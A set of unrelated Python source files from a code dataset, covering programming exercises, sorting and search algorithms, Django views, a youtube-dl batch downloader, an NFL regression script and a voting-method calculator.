fácilmente si un valor se encuentra en una lista (devuelve True o False)\r\nInstrucciones\r\nPara la solución de este problema, se requiere que el usuario escriba un script y utilice la estructura While.\r\nSe debe tener como prueba una lista llamada numero=[1,2,3] Con números enteros del 0 al 9. \r\nSe debe solicitar al usuario ingresar el número que quiera comprobar. \r\nEjemplo, si la lista de números tiene la siguiente estructura: numero=[1,3,5,9] y se ingresa por consola el numero 8, \r\ndebe salir un mensaje que diga que él numero 8 no se encuentra en la lista. Si el número que se coloca está en la lista, \r\nsale un mensaje que indique, el numero x esta en la lista\r\n'''\r\nnum = int(input(\"Ingrese un número entero del 0 al 9: \"))\r\nnumero = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n\r\nwhile num not in numero:\r\n    num = int(input(\"Ingrese un número entero del 0 al 9: \"))\r\nelse:\r\n    print(\"El numero\", num, \"está en la lista.\")","sub_path":"Ejer. Manejo de While.py","file_name":"Ejer. &#13;
Manejo de While.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"654214250","text":"# https://leetcode-cn.com/problems/largest-rectangle-in-histogram/\nfrom util.common_imports import *\nclass Solution:\n def largestRectangleArea(self, A: List[int]) -> int:\n if len(A) == 0:\n return 0\n\n res = A[0]\n for i in range(len(A)):\n if i == 0:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n\n cur = A[i] * (j - i) # A[i]为宽的矩形\n res = max(res, cur)\n continue\n\n if A[i] < A[i-1]:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n k = i - 1\n while k >= 0 and A[k] >= A[i]: # find A[k] < A[i] and stop\n k -= 1\n cur = A[i] * (j - (k + 1))\n res = max(res, cur)\n elif A[i] > A[i-1]:\n j = i + 1\n while j < len(A) and A[j] >= A[i]: # find A[j] < A[i] and stop\n j += 1\n\n cur = A[i] * (j - i) # A[i]为宽的矩形\n res = max(res, cur)\n return res\n\n# print (Solution().largestRectangleArea([2,1,5,6,2,3]))\n# print (Solution().largestRectangleArea([4,2]))\nprint (Solution().largestRectangleArea([2,1,2]))\n\n# 超出时间限制","sub_path":"stack/mono_stack 单调栈/84_largestRectangelArea.py","file_name":"84_largestRectangelArea.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"371857966","text":"def selection_sort(arr):\n # loop through n-1 elements\n for i in range(0, len(arr) - 1):\n # Create the index and hldr for the smallest index\n cur_index = i\n smallest_index = cur_index\n # Loop through the remaining array\n for x in range(i+1, len(arr)):\n # If the smallest index is larger than the next in line\n # then replace the next in line with smallest\n if arr[smallest_index] > arr[x]:\n smallest_index = x\n\n hldr = arr[i]\n arr[i] = arr[smallest_index]\n arr[smallest_index] = hldr\n\n return arr\n\n\ndef bubble_sort(arr):\n for x in range(len(arr)):\n for i in range(0, len(arr)-x-1):\n if arr[i] > arr[i+1]:\n arr[i], arr[i+1] = arr[i+1], arr[i]\n\n return arr\n\n\n# STRETCH: implement the Count Sort function below\ndef count_sort(arr, maximum=-1):\n # Check if entered array is empty\n if len(arr) == 0:\n # If true, also return empty array\n return []\n # Check if the smallest value is negative\n if min(arr) < 0:\n # If trye, return error message\n return 'Error, negative numbers not allowed in Count Sort'\n\n # If the maximum is entered, use that value instead\n if maximum == -1:\n maximum = max(arr)\n\n # Create array with integer key values from 0 to the max\n elements = maximum + 1\n count_array = [0] * elements\n\n # Count occurences of each value\n for x in arr:\n count_array[x] += 1\n\n # Initalize loop to add sourted to the output\n i = 0\n # Interate through each value in the count_array\n for x in range(elements):\n # Count number of each value\n for y in range(count_array[x]):\n arr[i] = x\n i += 1\n return arr\n","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189262895","text":"from linkedlist.IntersectionOfTwoLinkedList.main import ListNode, get_length, Solution\n\n\ndef test_get_length():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n assert get_length(head) == 3\n\n\ndef test_main():\n head1 = ListNode(1)\n 
head1.next = ListNode(2)\n head1.next.next = ListNode(3)\n head1.next.next.next = ListNode(4)\n head2 = ListNode(5)\n head2.next = head1.next.next\n intersection = head1.next.next\n solution = Solution()\n assert solution.getIntersectionNode(head1, head2) == intersection\n","sub_path":"linkedlist/IntersectionOfTwoLinkedList/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558152266","text":"# Problem: Implement Breadth-first search.\nfrom graph import Graph\nfrom collections import deque\n\n\nclass GraphBfs(Graph):\n\n def bfs(self, root, visit_func):\n # visit fun is passed a node every time a new node is reached\n if root is None:\n return\n queue = deque()\n queue.append(root)\n while queue:\n node = queue.popleft()\n visit_func(node)\n for neighbor in node.adj_nodes.values():\n if not neighbor.visited:\n neighbor.was_visited()\n queue.append(neighbor)\n","sub_path":"graphs_trees/bfs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"495508058","text":"#-*-coding:utf-8-*-\nfrom being.models import getuserbyname,getcounterpart,getking,getqueen\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom examination import forms\nfrom examination.models import *\nfrom django.contrib.auth.decorators import login_required\nfrom being.models import getadmin\n@login_required\ndef exam_take(request,eid):\n context=RequestContext(request)\n if request.method=='GET':\n # for sake of example use .get\n exam = getexam(eid)\n hastaken=False\n if exam.hastakenby(request.user):\n hastaken=True\n forms = [q.get_form()(prefix=str(q.id),\n content_object=request.user,\n question=q, form_tag=False)\n for q in exam.questions.all().get_real_instances()\n ]\n # form is a list of TextQuestionForm or ChoiceQuestionForm\n return render_to_response('exam_form.html',{'forms':forms,'exam':exam,'hastaken':hastaken},context)\n\n@login_required\ndef exam_save(request, eid):\n # for sake of example use .get\n exam = getexam(eid)\n forms = [q.get_form()(request.POST or None,\n prefix=str(q.id),\n content_object=request.user,\n question=q, form_tag=False)\n for q in exam.questions.all().get_real_instances()\n ]\n forms_are_valid = []\n for form in forms:\n valid = form.is_valid()\n forms_are_valid.append(valid)\n if valid:\n t = form.save()\n forms_are_valid = all(forms_are_valid)\n if forms_are_valid:\n exam.takenby(request.user)\n return HttpResponseRedirect(\"/exam/submit_success/\")\n else:\n return HttpResponseRedirect(\"/exam/submit_fail/\")\n\n@login_required\ndef exam_answer(request,uid,eid):\n # for sake of example use .get\n context=RequestContext(request)\n objectuser=getuser(uid)\n exam = getexam(eid)\n useranswers=exam.getanswersbyuser(objectuser)\n trueanswers=exam.getanswersbyuser(getadmin())\n l=len(useranswers)\n l2=len(trueanswers)\n if l==l2:\n answers=[(useranswers[i],trueanswers[i],True if list(useranswers[i].answer.all())==list(trueanswers[i].answer.all()) else False) for i in range(l)]\n right=[answers[i][2] for i in range(l)].count(True)\n score=100.0*right/l\n else:\n answers=[(useranswers[i],None,None) for i in range(l)]\n return 
render_to_response('exam_answer.html',{'exam':exam,'answers':answers,'objectuser':objectuser,'error':'Something wrong with this system, so we can not evaluate your score at this moment!'},context)\n return render_to_response('exam_answer.html',{'exam':exam,'answers':answers,'objectuser':objectuser,'right':right,'score':score},context)\n\ndef submit_success(request):\n if request.method=='GET':\n context=RequestContext(request)\n return render_to_response('success.html',{'content':'提交成功!'},context)\n\ndef submit_fail(request):\n if request.method=='GET':\n context=RequestContext(request)\n return render_to_response('fail.html',{'content':'提交失败!'},context)\n","sub_path":"examination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380622650","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import User, Vacations\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef register(request):\n print(request.POST)\n resultFromValidator = User.objects.registerValidator(request.POST)\n print(\"RESULT FROM VALIDATOR BELOW!\")\n print(resultFromValidator)\n if len(resultFromValidator)>0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/\")\n \n newUser= User.objects.create(Name= request.POST['name'], Username = request.POST['Uname'], Password= request.POST['pw'])\n print(\"HERE IS THE NEW USER\")\n print(newUser)\n request.session['loggedInId']= newUser.id\n\n return redirect(\"/travels\")\n\ndef login(request):\n print(request.POST)\n resultFromValidator = User.objects.loginValidator(request.POST)\n print(\"PRINT LOGIN VALIDATIONS HERE\")\n print(resultFromValidator)\n if len(resultFromValidator)>0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/\")\n\n UserMatch = User.objects.filter(Username= request.POST['username'])\n\n\n \n \n request.session['loggedInId'] = UserMatch[0].id\n \n \n \n\n \n\n \n \n return redirect(\"/travels\")\n\ndef travels(request):\n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n if 'loggedInId' not in request.session:\n messages.error(request, \"Log in to view Page.\")\n return redirect(\"/\")\n\n \n\n context = {\n 'loggedInId': loggedInUser,\n 'allVacations': Vacations.objects.all(),\n 'YourTrips': Vacations.objects.filter(PossibleTrips = loggedInUser),\n 'otherTrips': Vacations.objects.exclude(PossibleTrips = loggedInUser)\n\n }\n return render(request, \"travels.html\", context)\n\ndef logout(request):\n request.session.clear()\n return redirect(\"/\")\n\ndef addtrip(request):\n return render(request, \"addtrip.html\")\n\ndef createtrip(request): \n print(request.POST)\n resultFromValidator = Vacations.objects.vacationsValidator(request.POST)\n print(resultFromValidator)\n if len(resultFromValidator)> 0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/travels/add\")\n newVacation= Vacations.objects.create(Name= request.POST['des'], TravelStart= request.POST['leave'], TravelEnd= request.POST ['return'], Plan= request.POST ['desc'], Traveler= User.objects.get(id=request.session['loggedInId'] ))\n return redirect(\"/travels\")\n\ndef tripdetails(request, tripID): \n context = {\n 'trip2show' : Vacations.objects.get(id= tripID)\n\n }\n return render(request, 
\"tripinfo.html\", context)\n\ndef JoinTrip(request, tripID):\n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n this_trip = Vacations.objects.get(id= tripID)\n this_trip.PossibleTrips.add(loggedInUser)\n \n return redirect(\"/travels\")\n\ndef cancel(request, tripID): \n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n this_trip = Vacations.objects.get(id= tripID)\n this_trip.PossibleTrips.remove(loggedInUser)\n\n return redirect(\"/travels\")","sub_path":"pythonExamApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169022004","text":"from twisted.plugin import IPlugin\nfrom heufybot.moduleinterface import IBotModule\nfrom heufybot.modules.commandinterface import BotCommand\nfrom zope.interface import implements\nfrom random import choice\n\n\nclass ChooseCommand(BotCommand):\n implements(IPlugin, IBotModule)\n\n name = \"Choose\"\n\n def triggers(self):\n return [\"choose\", \"choice\"]\n\n def load(self):\n self.help = \"Commands: choose/choice , | Makes a choice out of the given options at random.\"\n self.commandHelp = {}\n\n def execute(self, server, source, command, params, data):\n if len(params) < 1:\n self.replyPRIVMSG(server, source, \"Choose what?\")\n return\n message = \" \".join(params)\n if \",\" in message:\n options = message.split(\",\")\n else:\n options = params\n self.replyPRIVMSG(server, source, \"Choice: {}\".format(choice(options).strip()))\n\n\nchooseCommand = ChooseCommand()\n","sub_path":"heufybot/modules/commands/choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98929518","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/foundation/api/amq/basic_message.py\n# Compiled at: 2012-10-12 07:02:39\n\"\"\"\nMessages for AMQP\n\n\"\"\"\nfrom serialization import GenericContent\n__all__ = [\n 'Message']\n\nclass Message(GenericContent):\n \"\"\"\n A Message for use with the Channnel.basic_* methods.\n\n \"\"\"\n PROPERTIES = [\n ('content_type', 'shortstr'),\n ('content_encoding', 'shortstr'),\n ('application_headers', 'table'),\n ('delivery_mode', 'octet'),\n ('priority', 'octet'),\n ('correlation_id', 'shortstr'),\n ('reply_to', 'shortstr'),\n ('expiration', 'shortstr'),\n ('message_id', 'shortstr'),\n ('timestamp', 'timestamp'),\n ('type', 'shortstr'),\n ('user_id', 'shortstr'),\n ('app_id', 'shortstr'),\n ('cluster_id', 'shortstr')]\n\n def __init__(self, body='', children=None, **properties):\n \"\"\"\n Expected arg types\n\n body: string\n children: (not supported)\n\n Keyword properties may include:\n\n content_type: shortstr\n MIME content type\n\n content_encoding: shortstr\n MIME content encoding\n\n application_headers: table\n Message header field table, a dict with string keys,\n and string | int | Decimal | datetime | dict values.\n\n delivery_mode: octet\n Non-persistent (1) or persistent (2)\n\n priority: octet\n The message priority, 0 to 9\n\n correlation_id: shortstr\n The application correlation identifier\n\n reply_to: shortstr\n The destination to reply to\n\n expiration: shortstr\n Message expiration specification\n\n message_id: shortstr\n The application message identifier\n\n timestamp: 
datetime.datetime\n The message timestamp\n\n type: shortstr\n The message type name\n\n user_id: shortstr\n The creating user id\n\n app_id: shortstr\n The creating application id\n\n cluster_id: shortstr\n Intra-cluster routing identifier\n\n Unicode bodies are encoded according to the 'content_encoding'\n argument. If that's None, it's set to 'UTF-8' automatically.\n\n example:\n\n msg = Message('hello world',\n content_type='text/plain',\n application_headers={'foo': 7})\n\n \"\"\"\n if isinstance(body, unicode):\n if properties.get('content_encoding', None) is None:\n properties['content_encoding'] = 'UTF-8'\n self.body = body.encode(properties['content_encoding'])\n else:\n self.body = body\n super(Message, self).__init__(**properties)\n return\n\n def __eq__(self, other):\n \"\"\"\n Check if the properties and bodies of this Message and another\n Message are the same.\n\n Received messages may contain a 'delivery_info' attribute,\n which isn't compared.\n\n \"\"\"\n return super(Message, self).__eq__(other) and self.body == other.body","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/basic_message.py","file_name":"basic_message.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"600027610","text":"\"\"\"Create a request for the Gooogle Cloud Genomics V2alpha1 pipelines api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport model\n\n\ndef create_pipeline_request(\n resources_config, job_config, actions, timeout=model.SEVEN_DAYS):\n \"\"\"Create a pipelines API request.\"\"\"\n envs = {}\n for vset in job_config.values():\n for v in vset:\n if hasattr(v, 'docker_path'):\n envs[v.name] = os.path.join(model.DATA_DISK_MOUNT, v.docker_path)\n else:\n envs[v.name] = v.value\n return {\n 'pipeline': {\n 'actions': [a.to_dict() for a in actions],\n 'resources': _create_resources(resources_config),\n 'environment': envs,\n 'timeout': timeout,\n },\n 'labels': {\n 'minsub': 'v1',\n },\n }\n\n\ndef _create_resources(rconfig):\n \"\"\"Create the resources payload of the pipelines request.\"\"\"\n vm = {\n 'machineType': rconfig.machine_type,\n 'preemptible': False,\n 'disks': [\n {\n 'name': model.DATA_DISK_NAME,\n 'sizeGb': rconfig.disk_size,\n }\n ],\n 'serviceAccount': {\n 'scopes': rconfig.scopes\n },\n }\n if rconfig.service_account:\n vm['serviceAccount']['email'] = rconfig.service_account\n return {\n 'projectId': rconfig.project,\n 'regions': [rconfig.region],\n 'virtualMachine': vm\n }\n","sub_path":"minsub/pipeline_api.py","file_name":"pipeline_api.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"131151249","text":"from __future__ import unicode_literals\nimport youtube_dl\n\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\nwith open('dalai_videolist') as f:\n for line in f:\n line = line.strip()\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([line])\n","sub_path":"dl_batch.py","file_name":"dl_batch.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202655222","text":"__author__ = 'ragav777'\nimport numpy as np\nimport scipy.optimize as op\nimport csv\nimport math\nimport 
random\n\n\n# CostFunction gets a X that is m x (n+1) for theta0\n# y is m x 1 theta is (n+1) x 1\ndef costfunction(theta, X, y, lda ):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n term1 = (1/(2*m)) * sum(np.square(error))\n temp2 = np.vstack((np.zeros((1,1), dtype = np.int), theta[1:n]))\n term2 = (lda/(2*m))*sum(np.square(temp2))\n J = term1 + term2\n return J\n\ndef gradient(theta, X, y, lda ):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n term1 = (1/m) * np.dot((X.T), error)\n temp2 = np.vstack((np.zeros((1,1), dtype = np.int), theta[1:n]))\n term2 = (lda/m)*temp2\n grad = term1 + term2\n return grad.flatten()\n\ndef trainlinearregression( X, y, lda, maxiter):\n m,n = X.shape\n initial_theta = np.zeros((n, 1))\n result = op.minimize(fun = costfunction, x0 = initial_theta, args = (X, y, lda), method = 'TNC',\n jac = gradient, options ={ 'disp': False, 'maxiter': maxiter } )\n optimal_theta = result.x\n return optimal_theta\n\ndef cost_matrix(theta, X, y):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n rmsqe = math.sqrt(sum(np.square(error))/m)\n return error,rmsqe\n\ndef nfldataread(ppos) :\n with open('RB_5wkav.csv', 'r') as csvfile:\n nflreader = csv.reader(csvfile, delimiter=',')\n wfh = open ( (str(ppos)+ \".csv\"), 'w', newline=\"\")\n wfha = csv.writer(wfh)\n count = 0\n countr = 0\n playerindex= []\n\n ymap = { '2010':1/6, '2011':2/6, '2012':3/6, '2013':4/6, '2014':5/6, '2015':6/6 }\n tmap = { 'BAL':1/32, 'CIN':2/32, 'CLE':3/32, 'PIT':4/32, 'CHI':5/32, 'DET':6/32, 'GB':7/32, 'MIN':8/32, 'HOU':9/32, 'IND':10/32,\n 'JAC':11/32, 'TEN':12/32, 'ATL':13/32, 'CAR':14/32, 'NO':15/32, 'TB':16/32, 'BUF':17/32, 'MIA':18/32, 'NE':19/32,\n 'NYJ':20/32, 'DAL':21/32, 'NYG':22/32, 'PHI':23/32, 'WAS':24/32, 'DEN':25/32, 'KC':26/32, 'OAK':27/32, 'SD':28/32,\n 'ARI':29/32, 'SF':30/32, 'SEA':31/32, 'STL':32/32 }\n for row in nflreader:\n\n for i in [0,1,2,5,6,7,8,9,10,11,15,18,19,23,24,26,30,32,33,34,35,36,27,38] :\n if row[i] == '' :\n row[i] = 0\n #Zeroing out empty params\n\n if count != 0 :\n year = str(row[0]) #i\n game_eid = row[1] #i\n game_week = float(row[2])/17 #ni\n game_time = str(row[5]) #ni\n home_team = row[6] #i\n away_team = row[7] #i\n score_home = float(row[8])/50 #ni\n score_away= float(row[9])/50 #ni\n fumbles_tot = int(row[10])\n rushing_yards = float(row[11])/100 #o\n #receiving_lngtd = row[18]\n #rushing_twopta = row[25] #i\n rushing_tds = float(row[15])/3 #o\n #receiving_rec = row[34]\n #receiving_twopta = row[36]\n receiving_yds = float(row[18])/100\n rushing_att = float(row[19])/10 #i\n #reciving_twoptm = row[40] #o\n #rushing_lngtd = row[44]\n #receiving_lng = row[48]\n pos = row[23]\n receiving_tds = float(row[24])/3 #o\n name =row[26]\n #rushing_twoptm = row[61] #o\n #rushing_lng = row[64]\n team = row[30] #i\n points = float(row[32])\n n5wavyds = float(row[33])/100\n n5wavatt = float(row[34])/10\n n5wavrutd = float(row[35])/3\n n5wavnrec = float(row[36])/10\n n5wavrecyds = float(row[37])/100\n n5wavrectd = float(row[38])/3\n\n\n\n if ((pos == ppos)) :\n if name not in playerindex :\n playerindex.append(name)\n player_number = float(playerindex.index(name)+1)/100\n\n map_year = ymap[year] #m\n if (team == home_team) :\n playing_home = 1 #m\n else :\n playing_home = 0 #m\n\n if (team == home_team) :\n played_against = tmap[away_team] #m\n else :\n played_against = tmap[home_team] #m\n\n #Added 
Game week #m\n #Added Player team's score #m\n if playing_home :\n team_score = float(score_home) #nm\n else :\n team_score = float(score_away) #nm\n\n #Added Opponent team's score #m\n if playing_home :\n opposition_score = float(score_away) #nm\n else:\n opposition_score = float(score_home) #nm\n\n #(ghr,gmin) = game_time.split(\":\")\n #time_played = int(ghr) + (int(gmin)/60) #nm\n\n temp = str(game_eid)\n month_played = float(int(temp[4:6])/12) #m\n\n total_points = (((rushing_tds+ receiving_tds)*18) + (( rushing_yards +receiving_yds)*10) \\\n -(fumbles_tot*2))/10\n\n #temp = -4.3*(playerindex.index(name)+1) + (5.2*map_year) + (1.0033*playing_home)-(2.03*played_against) +(1*game_week)\\\n #+(2.5*game_week) + (1*time_played) + (2.6*team_score) + (3.2*opposition_score) + (1.6*month_played)\n\n string = [ str(player_number), str(map_year), str(playing_home), str(played_against),\n str(game_week), str(team_score), str(opposition_score),\n str(month_played), str(tmap[team]),\n str(n5wavyds), str(n5wavatt), str(n5wavrutd), str(n5wavnrec), str(n5wavrecyds),\n str(n5wavrectd),\n str(n5wavyds**2), str(n5wavatt**2), str(n5wavrutd**2), str(n5wavnrec**2), str(n5wavrecyds**2),\n str(n5wavrectd**2),\n str(total_points), str(name), str(points) ]\n wfha.writerow(string)\n countr = countr +1\n count = count + 1\n wfh.close()\n return countr #Total records\n #print (countr) #Matched records\n\ndef createrandom(master,mtotal,mtrain,cv) :\n rndtemp = list(range(0,mtotal))\n random.shuffle(rndtemp)\n rndlinelist = sorted(rndtemp[1:mtrain+1])\n if cv:\n strng = \"cv\"\n wfh2 = open ( (master + \"minus\" + strng + \".csv\"), 'w', newline=\"\")\n wfha2 = csv.writer(wfh2)\n else:\n strng = \"train\"\n wfh = open ( (strng + str(mtrain) + \".csv\"), 'w', newline=\"\")\n wfha = csv.writer(wfh)\n count = 0\n countr = 0\n with open((str(master) + \".csv\"), 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n if count in rndlinelist:\n countr = countr +1 #matched\n wfha.writerow(row)\n elif ((count not in rndlinelist) and cv) :\n wfha2.writerow(row)\n\n count = count +1\n wfh.close()\n if cv:\n wfh2.close()\n return countr\n\n\ndef trainregression(mfile,lda,maxiter):\n Xtemp = np.loadtxt( (mfile +'.csv'), dtype = float, delimiter = ',', usecols = range(21) )\n mtr,ntr = np.shape(Xtemp)\n Xtrain = np.hstack ((np.ones ((mtr, 1)), Xtemp))\n Ytrain = np.loadtxt( (mfile + '.csv'), dtype = float, delimiter = ',', usecols = (21,) )\n theta = trainlinearregression( Xtrain, Ytrain, lda, maxiter)\n return theta\n\n\ndef cost_file(mfile, theta):\n Xtemp = np.loadtxt( (mfile +'.csv'), dtype = float, delimiter = ',', usecols = range(21) )\n m,n = np.shape(Xtemp)\n X = np.hstack ((np.ones ((m, 1)), Xtemp))\n y = np.loadtxt( (mfile + '.csv'), dtype = float, delimiter = ',', usecols = (21,) )\n theta = theta.reshape((n+1, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n # rmsqe = sum(abs(error))\n rmsqe = math.sqrt(sum(np.square(error))/m)\n return rmsqe\n\ndef main():\n\n lda = 0.001\n maxiter = 200\n master = 'RB'\n numcv = 1500\n iscv = 1\n istrain = 0\n\n mtotal = nfldataread(master) #returns num matched records\n print (\"mtotal \"+ str(mtotal))\n cvcount = createrandom(master,mtotal,numcv,iscv) #creates $master + \"minuscv\".csv and cv + $m.csv\n print (\"cvcount \"+ str(cvcount))\n mlist = [100,3467]\n for m in range(100,(mtotal-numcv),100):\n #for m in mlist :\n createrandom((master + \"minus\" + \"cv\"), (mtotal-numcv), m, istrain ) #creates $master + \"minuscsv\" + $m.csv\n 
theta = trainregression((\"train\" + str(m)),lda,maxiter)\n        errortrain = cost_file((\"train\" + str(m)), theta)\n        errorcv = cost_file((\"cv\"+str(cvcount)), theta)\n        print ( \"Trng m : \" + str(m) + \" Trng err : \" + str(errortrain) + \" cv error : \" + str(errorcv))\n    print (theta)\nif __name__ == '__main__' :\n    main()\nelse :\n    print(\"Didn't Work\")\n","sub_path":"LinearReg3.py","file_name":"LinearReg3.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2319193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 &#13;
-*-\n\n\"\"\"\n@author:knktc\n@contact:me@knktc.com\n@create:2018-07-21 08:58\n\"\"\"\n\n\"\"\"\nGiven a sorted (in ascending order) integer array nums of n elements and a target value, write a function to search target in nums. If target exists, then return its index, otherwise return -1.\n\n\nExample 1:\n\nInput: nums = [-1,0,3,5,9,12], target = 9\nOutput: 4\nExplanation: 9 exists in nums and its index is 4\n\nExample 2:\n\nInput: nums = [-1,0,3,5,9,12], target = 2\nOutput: -1\nExplanation: 2 does not exist in nums so return -1\n \n\nNote:\n\nYou may assume that all elements in nums are unique.\nn will be in the range [1, 10000].\nThe value of each element in nums will be in the range [-9999, 9999].\n\"\"\"\n\n\"\"\"\n使用二分法实现,要求list是有序的。\n用第一个index和最后一个index相加的结果除以2(//表示除后取整数部分)作为中间的index,然后再用中间的这个index对应的数据判断target在前半部分还是后半部分。\n\"\"\"\n\n__author__ = 'knktc'\n__version__ = '0.1'\n\n\nclass Solution:\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n low_index = 0\n hi_index = len(nums) - 1\n\n while hi_index >= low_index:\n mid_index = (low_index + hi_index) // 2\n if target > nums[mid_index]:\n low_index = mid_index + 1\n elif target < nums[mid_index]:\n hi_index = mid_index - 1\n else:\n return mid_index\n\n return -1\n\n\n\ndef main():\n \"\"\"\n main process\n\n \"\"\"\n s = Solution()\n\n test_cases = [\n ([-1, 0, 3, 5, 9, 12], 9),\n ([-1, 0, 3, 5, 9, 12], 5),\n ([-1, 0, 3, 5, 9, 12], 2),\n ([2, ], 2),\n ([-1, ], 2),\n\n ]\n for nums, target in test_cases:\n print(\"==========\")\n print(\"input: nums:{} target:{}\".format(nums, target))\n print(\"output: {}\".format(s.search(nums=nums, target=target)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"python/704.Binary_Search.py","file_name":"704.Binary_Search.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"384286300","text":"import operator\r\nimport pandas as pd\r\nheader_list = ['count', 'candidat1', 'candidat2', 'candidat3']\r\ndf = pd.read_csv('data.csv', names=header_list)\r\n\r\nsum_ = df['count'].sum()\r\nA, B, C, AB, BA, AC, CA, CB, BC = 0, 0, 0, 0, 0, 0, 0, 0, 0\r\nAB = df[(df.candidat1 == 'A')|((df.candidat2 == 'A' )&(df.candidat3 == 'B'))]['count'].sum()\r\nBA = sum_ - AB\r\nAC = df[(df.candidat1 == 'A')|((df.candidat2 == 'A' )&(df.candidat3 == 'C'))]['count'].sum()\r\nCA = sum_ - AC\r\nBC = df[(df.candidat1 == 'B')|((df.candidat2 == 'B' )&(df.candidat3 == 'C'))]['count'].sum()\r\nCB = sum_ - BC\r\n\r\ndic = {'А більше Б':[AB],'А більше С':[AC],'Б більше А':[BA],'Б білше С':[BC],'С більше А':[CA],'С більше Б':[CB],}\r\nresult = pd.DataFrame(dic)\r\nprint('Метод Кондорсе:')\r\nprint(result)\r\n\r\nif AB>BA and AC>CA:\r\n print('Виграє кандидат А')\r\nelif BA>AB and BC>CB:\r\n print('Виграє кандидат Б')\r\nelif CA>AC and CB>BC:\r\n print('Виграє кандидат С')\r\nelse:\r\n print('Переможця немає')\r\nprint()\r\n# Метод Борда\r\ndef bord(row, candidat):\r\n sum_ = 0\r\n if row.candidat1 == candidat:\r\n sum_ += int(row['count'])*3\r\n elif row.candidat2 == candidat:\r\n sum_ += int(row['count'])*2\r\n elif row.candidat3 == candidat:\r\n sum_ += int(row['count'])*1\r\n return sum_\r\n\r\n\r\nA = df.apply(bord,candidat = 'A', axis = 1).sum()\r\nB = df.apply(bord,candidat = 'B', axis = 1).sum()\r\nC = df.apply(bord,candidat = 'C', axis = 1).sum()\r\ndic2 = {'Кандидат А':[A],'Кандидат Б':[B],'Кандидат С':[C],}\r\nresult2 = pd.DataFrame(dic2)\r\nprint('Метод 
